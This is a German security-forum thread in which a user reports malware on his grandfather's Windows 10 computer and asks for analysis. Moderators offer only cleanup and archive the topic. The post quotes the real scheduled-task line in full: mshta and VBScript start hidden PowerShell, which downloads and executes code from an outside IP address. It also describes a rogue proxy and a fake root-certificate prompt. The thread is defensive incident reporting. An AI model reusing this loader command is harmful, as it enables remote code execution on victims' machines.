Hallo Leute,

ich wollte mal fragen, ob mir jemand ein paar Einblicke in einen gefundenen Trojaner geben kann, z.B. wie man sowas zukünftig findet, verhindert, was der Trojaner abgefischt haben könnte, ob es ein bekannter Trojaner oder was vollkommen anderes ist, ... .
Mein Grund ist einfach nur Interesse/Wissensdurst:

Hintergrund: Mein Opa bat mich um Hilfe, weil er keine Internetseiten mehr öffnen konnte und seit heute ständig eine Zertifikatsmeldung nervte.

Drei merkwürdige Dinge habe ich auf seinem Windows 10 Rechner gefunden:
1.) In den Windows-Einstellungen war ein systemweiter Proxy eingestellt:

Code: Alles auswählenAufklappen

ATTFilter

http=localhost:8000;https=localhost:8000
         

2.) im Taskplaner fand ich folgenden Task:

Code: Alles auswählenAufklappen

ATTFilter

mshta.exe  --> vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell  Invoke-Expression -Command:(wget -uri 185.141.27.215/gate990.php -method post -body cMgEfr65 -UseBasicParsing).content"", 0 : window.close")
         

Dieser Task hat die ständige Zertifikatsmeldung erzeugt, ich solle doch bitte folgendem Stammzertifikat zukünftig vertrauen: OV Verisign CA mit einem veralteten SHA1-Fingerprint.

3.) via Autostart-Ordner wurde eine ctfmon.exe gestartet, welche sich mit vielen anderen Dateien im %Appdata%-Unterordner 4FZBwVTf befand. Allerdings ist dies nur eine umbenannte Datei, denn tatsächlich handelt es sich hierbei um IronPython v2.7.11.
Damit wurde ein base64-kodiertes Python-Script (update.phy) ausgeführt, dessen Inhalt habe ich am Ende eingefügt. Mit dessen Dekodierung bin ich leider gescheitert, denn da kam bei mir nur Bytecode raus und bin daher mit meiner Detektivarbeit am Ende meines Wissens.

Fazit:
Virenscanner oder VirusTotal.com springen natürlich nicht an und damit läuft das Teil vollkommen unter dem Radar. Zum Glück hat die o.g. Vertrauensabfrage für das Verisign-Stammzertifikat alle 5 Minuten auf sich aufmerksam gemacht. Hätte mein Opa diesem Stammzertifikat einfach genervt zugestimmt, dann hätten vermutlich monatelang Daten über den lokalen Proxy vollkommen unbemerkt abgesaugt werden können?!?

nun zu meinen Fragen und zum Grund meiner Forumanfrage:
- kann mir jemand tiefere Einblick in die Hintergründe diese Trojaner geben, z.B.
- indem jemand den base64-code dekodiert und dann dessen Zweck versteht
- wie konnte der systemweite Proxy so leicht eingetragen werden?
- ist diese Malware schon länger bekannt, vielleicht in abgewandelter Form
- wie könnte man einen Virenscanner dazu bringen eine Warnung auszugeben,
der base64-code scheint jedenfalls zu gut getarnt oder unverdächtig zu wirken
- was soll ich meinem Opa zukünftig raten, um derartige Maleware nicht auf den Rechner zu bekommen?
- wie soll er sich jetzt nach dem Befall verhalten? Ich habe ihm schon mal geraten vorsichtshalber alle wichtigen Online-Passwörter zu ändern

Den Inhalt der Datei update.py findet Ihr nachfolgend. Den gesamten Ordner unter %AppData% mit IronPython und allen Script-Dateien kann ich bei Bedarf gern zur Verfügung stellen.

Mir ist nicht klar, wie Du auf Trojaner kommst. Bei IronPython v2.7.11 handelt es sich um ein legitimes Programm, das irgendwer installiert hat.


Solltest Du eine Bereinigung des Rechners wünschen:


Wir bitten euch, folgendes durchzulesen und abzuarbeiten:
Für alle Hilfesuchenden! Was muss ich vor der Eröffnung eines Themas beachten?

Nur mit diesen Informationen können wir euch helfen.

Es werden grundsätzlich nur Betriebssysteme bereinigt, die noch eine offizielle Unterstützung von Microsoft erhalten.
Dies gilt aktuell für Windows 8.1 sowie Windows 10 v2004 oder neuer.

Zitat:

Zitat von trwhfrkhgn

nun zu meinen Fragen und zum Grund meiner Forumanfrage:
- kann mir jemand tiefere Einblick in die Hintergründe diese Trojaner geben, z.B.
- indem jemand den base64-code dekodiert und dann dessen Zweck versteht
- wie konnte der systemweite Proxy so leicht eingetragen werden?
- ist diese Malware schon länger bekannt, vielleicht in abgewandelter Form
- wie könnte man einen Virenscanner dazu bringen eine Warnung auszugeben,
der base64-code scheint jedenfalls zu gut getarnt oder unverdächtig zu wirken
- was soll ich meinem Opa zukünftig raten, um derartige Maleware nicht auf den Rechner zu bekommen?
- wie soll er sich jetzt nach dem Befall verhalten? Ich habe ihm schon mal geraten vorsichtshalber alle wichtigen Online-Passwörter zu ändern

Den Inhalt der Datei update.py findet Ihr nachfolgend. Den gesamten Ordner unter %AppData% mit IronPython und allen Script-Dateien kann ich bei Bedarf gern zur Verfügung stellen.

Wie felix1 bereits angedeutet hat, können wir dir bei einer Bereinigung behilflich sein, nicht mehr und nicht weniger. Auf unsere Regeln hat felix1 ja bereits verlinkt.
Beim Aufspühren und Entfernen von Malware können wir helfen.

Alles andere (detailierte Analyse) überlasse ich persönlich Leuten, die Experten im Bereich Malwareanalyse sind. Da können wir dir nicht behilflich sein.

Und wie die Malware auf das System gekommen ist, könnte man evtl. nach der Analyse von Logdateien und einer Befragung herausfinden (siehe auch die häufigsten Einfallstore für Malware).

Wenn du an einer Bereinigung interessiert bist, poste die geforderten Logdateien und wir helfen bei der Bereinigung.
Wenn du kein Interesse an einer Bereinigung hast und lieber eine Neuinstallation durchführen möchtest, ist das auch in Ordnung für uns.

Wir werden hier jedoch nicht "diskutieren", in diesem Subforum geht es um die Entfernung von Malware.

Gib einfach Bescheid.

Vielen Dank für Eure Rückmeldungen. Entschuldigt bitte, ich wollte die Forumregeln nicht verletzen. Ohne groß die Regeln zu lesen, ging ich davon aus, dass man sich im Trojaner-Board auch über Trojaner austauschen kann. Habt Ihr vielleicht einen Hinweis für mich, wo ich vielleicht meine Frage loswerden könnte? Ich würde gerne was dazulernen und neue Trojaner gibt's immer. Falls meine Anfrage hier vollkommen Offtopic ist, dann dürft Ihr ihn gern löschen. Ich möchte kein Störenfried auf diesem Board sein und bitte vielmals um Entschuldigung.

Malwareanalysten (diverser Sicherheitsfirmen, wie z. B. Microsoft, Malwarebytes, Kaspersky, etc.) können dir evtl. deine Fragen beantworten.
Du solltest dort einmal nachfragen.

Ich verschiebe dieses Thema ins Archiv.